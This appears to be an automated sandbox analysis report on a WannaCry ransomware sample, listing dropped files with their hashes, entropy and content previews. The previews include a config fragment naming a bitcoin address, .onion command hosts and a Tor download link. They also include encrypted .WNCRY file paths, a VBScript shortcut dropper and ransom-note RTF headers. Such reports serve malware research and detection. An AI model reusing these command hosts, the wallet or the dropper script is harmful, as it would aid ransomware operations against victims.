                                                                              Preview:...............................................................................................................f...........C......................................................115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn................gx7ekbenv2riucmf.onion;57g7spgrzlojinas.onion;xxlvbrloxvriy2c5.onion;76jdd2ir2embyv47.onion;cwwnhwhlz52maqm7.onion;.......................................................................................................................................https://dist.torproject.org/torbrowser/6.5.1/tor-win32-0.2.9.10.zip...........................................................................................................................................................................................................................................
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):458
                                                                              Entropy (8bit):5.241272420901258
                                                                              Encrypted:false
                                                                              SSDEEP:12:oWHSUnjBkJHnjztHJHSuVPD5HJHSuVPf+JHVYeVhrWbSHJH0H2M2L9:oWy/JH3t8uVF8uVOJ1YeVASe2R
                                                                              MD5:ACE41BB88EA01E093A3674AAEA60EECF
                                                                              SHA1:B89767BD78E9705E691FE4D12416DB179C0B9B60
                                                                              SHA-256:B26D3468F40849C3123D6CECE35F232FD68C4A2FBA0DD03ECCC126FCFA6D9A75
                                                                              SHA-512:E151723E87406F8C7FD6BACDD5F6B31B572656CFB363D16CAA9874C40931A4CC20DF41C491EC5830E50ADC21C1D2AEFEEAC2B3488F8338094C96A577C73C52CF
                                                                              Malicious:false
                                                                              Preview:C:\Users\user\Desktop\IPKGELNTQY\BJZFPPWAPT.png.WNCRY..C:\Users\user\Documents\IPKGELNTQY\IPKGELNTQY.docx.WNCRY..C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\GIGIYTFFYT.pdf.WNCRY..C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VEPKBVANJO.png.WNCRY..C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1280.db.WNCRY..C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\pkcs11.txt.WNCRY..
                                                                              Process:C:\Windows\SysWOW64\cmd.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):199
                                                                              Entropy (8bit):4.912726038453008
                                                                              Encrypted:false
                                                                              SSDEEP:3:gponhvDCKFcsDsHVWW+WlynJ96JS2x9rbPsHVWW+WlynJSK2Fvn:e+hvbsHvRoJgJSoPsHvRoJSK2Fv
                                                                              MD5:39BF0B9AB256A154C623E7EA69C6DCE7
                                                                              SHA1:3D7A9AAD6554B5ED84A49652A826AFA3B75CA4BA
                                                                              SHA-256:ABE986A51CF74A94EC6213066C13C18A403515D632C0A73F8B789A971A0637BC
                                                                              SHA-512:563FCD42580CF4F95EECED90ADBAE5C2D84B5F5DEF76376380B2872049FBBF697F26F91F22DF97FDC08CA84368749BDA2EA22A9F2E89CFE98CEA00134C059803
                                                                              Malicious:true
                                                                              Preview:SET ow = WScript.CreateObject("WScript.Shell")..SET om = ow.CreateShortcut("C:\Users\user\Desktop\@WanaDecryptor@.exe.lnk")..om.TargetPath = "C:\Users\user\Desktop\@WanaDecryptor@.exe"..om.Save..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):47879
                                                                              Entropy (8bit):4.950611667526586
                                                                              Encrypted:false
                                                                              SSDEEP:768:Shef3jHdCG28Eb1tyci8crbEw6/5+3xFkbP0vyzbZrS14e:SheU5De
                                                                              MD5:95673B0F968C0F55B32204361940D184
                                                                              SHA1:81E427D15A1A826B93E91C3D2FA65221C8CA9CFF
                                                                              SHA-256:40B37E7B80CF678D7DD302AAF41B88135ADE6DDF44D89BDBA19CF171564444BD
                                                                              SHA-512:7601F1883EDBB4150A9DC17084012323B3BFA66F6D19D3D0355CF82B6A1C9DCE475D758DA18B6D17A8B321BF6FCA20915224DBAEDCB3F4D16ABFAF7A5FC21B92
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):54359
                                                                              Entropy (8bit):5.015093444540877
                                                                              Encrypted:false
                                                                              SSDEEP:768:SWjkSFwwlUdcUG2HAmDTzpXtgmDNQ8qD7DHDqMtgDdLDMaDoKMGzD0DWJQ8/QoZ4:SWcwiqDB
                                                                              MD5:0252D45CA21C8E43C9742285C48E91AD
                                                                              SHA1:5C14551D2736EEF3A1C1970CC492206E531703C1
                                                                              SHA-256:845D0E178AEEBD6C7E2A2E9697B2BF6CF02028C50C288B3BA88FE2918EA2834A
                                                                              SHA-512:1BFCF6C0E7C977D777F12BD20AC347630999C4D99BD706B40DE7FF8F2F52E02560D68093142CC93722095657807A1480CE3FB6A2E000C488550548C497998755
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\f44\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}@\'b9\'d9\'c5\'c1;}..{\f45\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}@MingLiU;}{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}..{\f54\fbidi \fmodern\fchar
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):79346
                                                                              Entropy (8bit):4.901891087442577
                                                                              Encrypted:false
                                                                              SSDEEP:768:SDwtkzjHdLG2xN1fyvnywUKB5lylYlzlJpsbuEWeM/yDRu9uCuwyInIwDOHEhm/v:SDnz5Rt4D4
                                                                              MD5:2EFC3690D67CD073A9406A25005F7CEA
                                                                              SHA1:52C07F98870EABACE6EC370B7EB562751E8067E9
                                                                              SHA-256:5C7F6AD1EC4BC2C8E2C9C126633215DABA7DE731AC8B12BE10CA157417C97F3A
                                                                              SHA-512:0766C58E64D9CDA5328E00B86F8482316E944AA2C26523A3C37289E22C34BE4B70937033BEBDB217F675E40DB9FECDCE0A0D516F9065A170E28286C2D218487C
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f11\fbidi \fmodern\fcharset128\fprq1{\*\panose 02020609040205080304}MS Mincho{\*\falt ?l?r ??\'81\'66c};}{\f12\fbidi \froman\fcharset129\fprq2{\*\panose 02030600000101010101}\'b9\'d9\'c5\'c1{\*\falt Batang};}..{\f18\fbidi \fmodern\fcharset136\fprq1{\*\panose 02020509000000000000}MingLiU{\*\falt 2OcuAe};}{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}..{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):39070
                                                                              Entropy (8bit):5.03796878472628
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdb2YG2+d18Scgn8c8/868H1F8E8/8Z3m8VdAm86a8n:Shef3jHd3G2n+p/mZrS14A
                                                                              MD5:17194003FA70CE477326CE2F6DEEB270
                                                                              SHA1:E325988F68D327743926EA317ABB9882F347FA73
                                                                              SHA-256:3F33734B2D34CCE83936CE99C3494CD845F1D2C02D7F6DA31D42DFC1CA15A171
                                                                              SHA-512:DCF4CCF0B352A8B271827B3B8E181F7D6502CA0F8C9DDA3DC6E53441BB4AE6E77B49C9C947CC3EDE0BF323F09140A0C068A907F3C23EA2A8495D1AD96820051C
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):40512
                                                                              Entropy (8bit):5.035949134693175
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2yG2gv8n8+8zfB8k8F8i8k1Z8M8I818E838C8A8s:Shef3jHd2G26nyMZrS14g
                                                                              MD5:537EFEECDFA94CC421E58FD82A58BA9E
                                                                              SHA1:3609456E16BC16BA447979F3AA69221290EC17D0
                                                                              SHA-256:5AFA4753AFA048C6D6C39327CE674F27F5F6E5D3F2A060B7A8AED61725481150
                                                                              SHA-512:E007786FFA09CCD5A24E5C6504C8DE444929A2FAAAFAD3712367C05615B7E1B0FBF7FBFFF7028ED3F832CE226957390D8BF54308870E9ED597948A838DA1137B
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):37045
                                                                              Entropy (8bit):5.028683023706024
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHd02wG2roqni2Jeo75Y3kmA31dv61QyU:Shef3jHd4G2M5bZrS14Q
                                                                              MD5:2C5A3B81D5C4715B7BEA01033367FCB5
                                                                              SHA1:B548B45DA8463E17199DAAFD34C23591F94E82CD
                                                                              SHA-256:A75BB44284B9DB8D702692F84909A7E23F21141866ADF3DB888042E9109A1CB6
                                                                              SHA-512:490C5A892FAC801B853C348477B1140755D4C53CA05726AC19D3649AF4285C93523393A3667E209C71C80AC06FFD809F62DD69AE65012DCB00445D032F1277B3
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):36987
                                                                              Entropy (8bit):5.036160205965849
                                                                              Encrypted:false
                                                                              SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdp2oG2/CzhReo75Y3kmA31dv61Qyz:Sw3BHSWjHdBG2/UhsZrS14f
                                                                              MD5:7A8D499407C6A647C03C4471A67EAAD7
                                                                              SHA1:D573B6AC8E7E04A05CBBD6B7F6A9842F371D343B
                                                                              SHA-256:2C95BEF914DA6C50D7BDEDEC601E589FBB4FDA24C4863A7260F4F72BD025799C
                                                                              SHA-512:608EF3FF0A517FE1E70FF41AEB277821565C5A9BEE5103AA5E45C68D4763FCE507C2A34D810F4CD242D163181F8341D9A69E93FE32ADED6FBC7F544C55743F12
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):36973
                                                                              Entropy (8bit):5.040611616416892
                                                                              Encrypted:false
                                                                              SSDEEP:384:S93BHSj2cguALeT+sPzy3EFHjHdM2EG2YLC7O3eo75Y3kmA31dv61QyW:S93BHSTjHd0G2YLCZrS14y
                                                                              MD5:FE68C2DC0D2419B38F44D83F2FCF232E
                                                                              SHA1:6C6E49949957215AA2F3DFB72207D249ADF36283
                                                                              SHA-256:26FD072FDA6E12F8C2D3292086EF0390785EFA2C556E2A88BD4673102AF703E5
                                                                              SHA-512:941FA0A1F6A5756ED54260994DB6158A7EBEB9E18B5C8CA2F6530C579BC4455918DF0B38C609F501CA466B3CC067B40E4B861AD6513373B483B36338AE20A810
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset0\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhim
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):37580
                                                                              Entropy (8bit):5.0458193216786
                                                                              Encrypted:false
                                                                              SSDEEP:384:Sw3BHSj2cLeT+sPzy3EFHjHdi2MG2AGsi6p07i/eo75Y3kmA31dv61QyR:Sw3BHSWjHdGG2Axa7iGZrS14N
                                                                              MD5:08B9E69B57E4C9B966664F8E1C27AB09
                                                                              SHA1:2DA1025BBBFB3CD308070765FC0893A48E5A85FA
                                                                              SHA-256:D8489F8C16318E524B45DE8B35D7E2C3CD8ED4821C136F12F5EF3C9FC3321324
                                                                              SHA-512:966B5ED68BE6B5CCD46E0DE1FA868CFE5432D9BF82E1E2F6EB99B2AEF3C92F88D96F4F4EEC5E16381B9C6DB80A68071E7124CA1474D664BDD77E1817EC600CB4
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}..{\f53\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}\'b1\'bc\'b8\'b2\'c3\'bc;}{\f54\fbidi \fmodern\fcharset129\fprq1{\*\panose 020b0609000101010101}@\'b1\'bc\'b8\'b2\'c3\'bc;}..{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\fhimajor\f31502\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):38377
                                                                              Entropy (8bit):5.030938473355282
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdg2oG2l1glOmeo75Y3kmA31dv61QyB:Shef3jHdMG2l1AO3ZrS14l
                                                                              MD5:35C2F97EEA8819B1CAEBD23FEE732D8F
                                                                              SHA1:E354D1CC43D6A39D9732ADEA5D3B0F57284255D2
                                                                              SHA-256:1ADFEE058B98206CB4FBE1A46D3ED62A11E1DEE2C7FF521C1EEF7C706E6A700E
                                                                              SHA-512:908149A6F5238FCCCD86F7C374986D486590A0991EF5243F0CD9E63CC8E208158A9A812665233B09C3A478233D30F21E3D355B94F36B83644795556F147345BF
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):38437
                                                                              Entropy (8bit):5.031126676607223
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdtW2IG2sjqMeo75Y3kmA31dv61Qyg:Shef3jHd0G2smJZrS14M
                                                                              MD5:4E57113A6BF6B88FDD32782A4A381274
                                                                              SHA1:0FCCBC91F0F94453D91670C6794F71348711061D
                                                                              SHA-256:9BD38110E6523547AED50617DDC77D0920D408FAEED2B7A21AB163FDA22177BC
                                                                              SHA-512:4F1918A12269C654D44E9D394BC209EF0BC32242BE8833A2FBA437B879125177E149F56F2FB0C302330DEC328139B34982C04B3FEFB045612B6CC9F83EC85AA9
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):37181
                                                                              Entropy (8bit):5.039739267952546
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdN26G2VSA1Ieo75Y3kmA31dv61QyU:Shef3jHdfG2oe1ZrS14w
                                                                              MD5:3D59BBB5553FE03A89F817819540F469
                                                                              SHA1:26781D4B06FF704800B463D0F1FCA3AFD923A9FE
                                                                              SHA-256:2ADC900FAFA9938D85CE53CB793271F37AF40CF499BCC454F44975DB533F0B61
                                                                              SHA-512:95719AE80589F71209BB3CB953276538040E7111B994D757B0A24283AEFE27AADBBE9EEF3F1F823CE4CABC1090946D4A2A558607AC6CAC6FACA5971529B34DAC
                                                                              Malicious:false
                                                                              Preview:{\rtf1\adeflang1025\ansi\ansicpg1252\uc2\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1033\deflangfe1042\themelang1033\themelangfe1042\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f2\fbidi \fmodern\fcharset0\fprq1{\*\panose 02070309020205020404}Courier New;}..{\f34\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f36\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f37\fbidi \froman\fcharset0\fprq2{\*\panose 02040503050406030204}Cambria;}{\f40\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}@\'b8\'bc\'c0\'ba \'b0\'ed\'b5\'f1;}..{\f41\fbidi \fmodern\fcharset0\fprq1{\*\panose 020b0609020204030204}Consolas;}{\flomajor\f31500\fbidi \froman\fcharset0\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \fmodern\fcharset129\fprq2{\*\panose 020b0503020000020004}\'b8\'bc\'c0\'ba
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
                                                                              Category:dropped
                                                                              Size (bytes):49044
                                                                              Entropy (8bit):4.910095634621579
                                                                              Encrypted:false
                                                                              SSDEEP:384:SheftipUENLFsPzy3EFHjHdc2oG2WWDFFG5BwKeo75Y3kmA31dv61QyM:Shef3jHdoG2NHG5BwLZrS14Q
                                                                              MD5:FB4E8718FEA95BB7479727FDE80CB424
                                                                              SHA1:1088C7653CBA385FE994E9AE34A6595898F20AEB
                                                                              SHA-256:E13CC9B13AA5074DC45D50379ECEB17EE39A0C2531AB617D93800FE236758CA9
                                                                              SHA-512:24DB377AF1569E4E2B2EBCCEC42564CEA95A30F1FF43BCAF25A692F99567E027BCEF4AACEF008EC5F64EA2EEF0C04BE88D2B30BCADABB3919B5F45A6633940CB
                                                                              Malicious:false
